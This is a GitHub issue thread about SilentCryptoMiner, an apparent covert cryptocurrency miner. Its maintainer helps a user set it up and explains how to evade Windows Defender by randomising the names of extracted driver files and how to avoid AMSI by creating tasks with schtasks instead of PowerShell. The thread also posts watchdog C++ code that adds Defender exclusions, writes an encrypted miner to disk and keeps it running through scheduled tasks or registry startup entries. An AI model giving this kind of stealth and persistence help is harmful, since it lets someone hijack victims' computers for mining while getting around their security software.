### ISSUE TITLE
A new version

### ISSUE THREAD

**Issue by masterjek** [UnamSanctam/SilentCryptoMiner#1764]
Good afternoon Unam. Can you please give a draft of the new version, just upload it to a file sharing service. I don’t understand, maybe the code changes, but I can’t set everything up as it was in the previous version.

**Comment by UnamSanctam** [comment]
Sorry, what exactly do you mean?

**Comment by masterjek** [comment]
I mean, can you please upload the project itself, not the finished builder, but the project to a file sharing service? I have a suspicion that the github changed something in the code and it does not work for me.

**Comment by UnamSanctam** [comment]
Sure I can do that but building it from GitHub works for me, I moved the `SilentCryptoMiner.sln` file in the new version so make sure you start the one inside the `SilentCryptoMiner` folder. But here is a link to the code: https://gofile.io/d/5rT18Z.

**Comment by masterjek** [comment]
Here's what else I want to know, before that, all previous versions of the miner worked without problems after encryption. The new version stops working after encryption. I already have the feeling that it is protected from encryption. Or you have made many changes that the encryption is now breaking it.

**Comment by UnamSanctam** [comment]
Hmm, no there's no special reason why it shouldn't work. At what point does it break for you? As in, what are you specifically encrypting and at what part of the process does it break?

**Comment by masterjek** [comment]
I'm sorry for the disturbance. It happened because of my stupidity.

**Comment by UnamSanctam** [comment]
Haha, no problem. Hope the mining goes well.

**Comment by masterjek** [comment]
Tell me more and now the library for the miner xmrig - WinRing0x64.sys not extracted to default folder?

**Comment by UnamSanctam** [comment]
Now it gets extracted to a randomized name in the temp folder, because it seems like Windows Defender has specifically been starting to target my default folder names (and filenames). I had a Windows Defender detection on my VM that I was able to bypass by randomizing the name.

**Comment by masterjek** [comment]
Sorry for so many questions. Can you tell me the part of the code that is responsible for creating the task in the scheduler? I'm just creating a task myself and I need to disable this part. This causes some antiviruses to be detected.

**Comment by UnamSanctam** [comment]
Here is where it creates the Task (also does so in the Watchdog):
https://github.com/UnamSanctam/SilentCryptoMiner/blob/be942c0355f222c85e584c210156ee76f6ca894c/SilentCryptoMiner/Resources/Code/miner.cpp#L159
In the new version it extracts an .xml file and then creates a Task using only schtasks instead of Powershell to avoid AMSI detections. So if you want to disable all Task/Registry startup creation then you can remove/comment out everything from line 146 to line 164.

**Comment by masterjek** [comment]
I understand you correctly, if I comment out the listed lines, I will disable only the creation of the task in the scheduler? Will all other functions work fine?

**Comment by UnamSanctam** [comment]
Yes then you will disable only the creation of the Task and also the registry creation (Task creation is for administrators, registry creation is for normal users). Since it sounds like you always run it as administrator then you can disable both of them. All other things will work fine except for the miner start directly after install (unless the Task your create has the same entry name) since it tries to start the miner by starting the Task. The Watchdog also checks and uses the Task a lot, so you would also need to modify the watchdog: https://github.com/UnamSanctam/SilentCryptoMiner/blob/master/SilentCryptoMiner/Resources/Code/watchdog.cpp

**Comment by masterjek** [comment]
I don't use a watchdog timer. I'm stupid in programming, tell me how to comment out this line?

**Comment by UnamSanctam** [comment]
You want to remove everything that has to do with Tasks from the watchdog?

If so then change this code:
```
bool startupMissing = isAdmin ? !check_key_registry(AYU_OBFUSCATEW(L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\#STARTUPENTRYNAME")) : false;
        if ((!check_mutex(AYU_OBFUSCATEW(L"\\BaseNamedObjects\\#MUTEXMINER")) && minerMissing) || fileMissing || startupMissing) {
#if DefWDExclusions
            run_program(true, sysdir, powershellPath, AYU_OBFUSCATEW(L"%S #WDCOMMAND"), powershellPath);
#endif
            if (isAdmin) {
                wchar_t tmpTaskTemplate[MAX_PATH] = { 0 };
                combine_path(tmpTaskTemplate, get_env(pebenv, AYU_OBFUSCATEW(L"TEMP=")), AYU_OBFUSCATEW(L"#TMPXML"));
                write_resource(resTaskTemplate, resTaskTemplateSize, tmpTaskTemplate, L"");
                run_program(true, sysdir, schtasksPath, AYU_OBFUSCATEW(L"%S #STARTUPADDADMIN"), schtasksPath, tmpTaskTemplate);
                delete_file(tmpTaskTemplate);
            }
            else {
                run_program(true, sysdir, regPath, AYU_OBFUSCATEW(L"%S #STARTUPADDUSER"), regPath, startupPath);
            }

            if (fileMissing) {
                cipher((BYTE*)minerFile, fileSize);
                write_file(startupPath, minerFile, fileSize);
                cipher((BYTE*)minerFile, fileSize);
            }

            if (isAdmin) {
                run_program(false, sysdir, schtasksPath, AYU_OBFUSCATEW(L"%S #STARTUPSTARTADMIN"), schtasksPath);
            }
            else {
                run_program(false, sysdir, startupPath, AYU_OBFUSCATEW(L"%S"), startupPath);
            }
        }
```

To:
```
        if ((!check_mutex(AYU_OBFUSCATEW(L"\\BaseNamedObjects\\#MUTEXMINER")) && minerMissing) || fileMissing) {
#if DefWDExclusions
            run_program(true, sysdir, powershellPath, AYU_OBFUSCATEW(L"%S #WDCOMMAND"), powershellPath);
#endif
            if (fileMissing) {
                cipher((BYTE*)minerFile, fileSize);
                write_file(startupPath, minerFile, fileSize);
                cipher((BYTE*)minerFile, fileSize);
            }

           run_program(false, sysdir, startupPath, AYU_OBFUSCATEW(L"%S"), startupPath);
        }
```

**Comment by masterjek** [comment]
No, I meant that I do not use the watchdog timer, I turn it off in the builder and do not use it. I mean, what does it mean to comment out a line, is it to put some character in front of it, so that this line does not work?

**Comment by UnamSanctam** [comment]
If you do not use the Watchdog at all then yeah don't worry about that.
To comment out a line you can do this:
`// This line has been commented out`

Or if you're commenting out multiple lines then you can do this:
```
/* All
These
Lines
Are
Commented
Out */
```

**Comment by masterjek** [comment]
Unam can you please find out which part of the code is responsible for copying the miner to the folder? I am implementing this function with another program.

**Comment by UnamSanctam** [comment]
This line is what writes the miner to the install folder, the line above it is what reads the original file:
https://github.com/UnamSanctam/SilentCryptoMiner/blob/be942c0355f222c85e584c210156ee76f6ca894c/SilentCryptoMiner/Resources/Code/miner.cpp#L169

The function used to write the file is inside the `common.cpp` file:
https://github.com/UnamSanctam/SilentCryptoMiner/blob/be942c0355f222c85e584c210156ee76f6ca894c/SilentCryptoMiner/Resources/Code/Includes/common.cpp#L413

**Comment by masterjek** [comment]
I removed this line in the previous version
SilentCryptoMiner/SilentCryptoMiner/Classes/Codedom.cs - line 381
I don't see this line in the new version, or I can't find it? Is she also responsible for creating a task in the scheduler?

**Comment by UnamSanctam** [comment]
The `Codedom.cs` lines are there for replacing the commands inside the miner code with the correct ones, but since you already removed the code inside `Miner.cpp` that does everything then there's no need to remove the Codedom string replacing code.
